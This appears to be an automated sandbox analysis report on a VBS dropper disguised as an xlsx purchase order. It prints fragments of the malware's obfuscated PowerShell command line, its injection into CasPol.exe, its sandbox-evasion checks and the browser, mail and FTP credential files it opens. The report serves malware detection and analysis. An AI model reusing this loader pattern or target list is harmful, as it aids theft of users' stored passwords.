          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9078
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 666
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: wscript.exe, 00000000.00000003.1687529078.0000016C0C123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1684123875.0000016C0C120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznfekopperneX?
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 0000000B.00000002.6724207212.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
          Source: PO-09784893 xlsx.vbsBinary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 0000000B.00000002.6724207212.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.6719479887.0000000000E3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.1683925145.0000016C0C1E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
          Source: PO-09784893 xlsx.vbsBinary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FA8B5B8 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7836, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Exfiltration Over Alternative Protocol
          1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts321
          Scripting
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          115
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts21
          Command and Scripting Interpreter
          Logon Script (Windows)11
          Process Injection
          321
          Scripting
          Security Account Manager221
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell
          Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer22
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets241
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items241
          Virtualization/Sandbox Evasion
